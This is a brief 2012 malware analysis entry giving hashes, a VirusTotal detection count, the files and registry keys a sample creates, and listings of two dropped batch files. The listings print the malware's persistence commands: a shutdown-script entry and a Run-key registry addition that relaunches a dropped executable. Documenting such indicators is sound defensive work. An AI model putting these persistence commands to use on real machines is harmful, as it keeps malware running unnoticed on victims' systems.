01.06.2012, 16:42
Malware info:
SHA256: 25cc8f985fb2dcbc626c4339e4fa06fa18b988f83b03126753d4b1767b874421
SHA1: 9f6586f2059e3f68f1a52aa7384500fae92f9cfb
MD5: c953ad62942f002ef8f0e7eac2f31e64
File size: 163.8 KB ( 167698 bytes )
VT info (30/42):
Changes in the system:
- Registry Key:
HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Script "%Program Files%\Internet Explorer\opnerRi.bat"
Files:
%Program Files%\Internet Explorer\crlss.exe
%Program Files%\Internet Explorer\filer.tmp
%Program Files%\Internet Explorer\opnerRi.bat
%Program Files%\Internet Explorer\opnerRi.exe
%WinDir%\inf\ypangolin.bat
%SysDir%\GroupPolicy\gpt.ini
%SysDir%\GroupPolicy\Machine\Scripts\scripts.ini
opnerRi.bat listing :
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "" /t REG_SZ /d C:\WINDOWS\inf\ypangolin.bat /f
UFOUFO\UECOMT8f764frOyueniIiLi6fky/yziI+PiZk=
ypangolin.bat listing :
start C:\"Program Files"\"Internet Explorer"\opnerRi.exe